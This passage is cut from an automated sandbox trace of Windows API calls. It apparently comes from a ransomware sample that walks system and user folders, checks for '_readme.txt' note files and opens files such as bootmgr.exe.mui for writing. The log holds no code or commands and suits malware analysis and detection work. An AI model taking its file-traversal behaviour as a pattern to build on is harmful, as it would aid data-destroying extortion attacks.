hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.853] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.853] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.853] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.853] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.853] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.853] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.853] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.853] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.853] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.853] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.854] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.854] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.855] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.855] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.856] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.856] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.856] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.856] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.856] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.856] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.856] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.856] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.856] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0146.856] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.856] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.856] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.856] PathFindFileNameW (pszPath="") returned="" [0146.856] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.856] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.856] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.856] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.856] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.856] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.856] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.857] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0146.857] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0146.857] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.857] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.857] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.857] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.857] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.857] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0146.857] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.857] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.857] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.857] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned=".txt" [0146.857] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.857] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.857] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.857] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.857] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.857] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.857] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.858] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.858] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.859] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.860] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.860] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.860] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e778 [0146.860] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.860] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.860] PathFindFileNameW (pszPath="") returned="" [0146.860] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.860] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.860] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.860] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.860] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.860] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.860] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.860] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.860] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0146.860] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.860] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0146.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 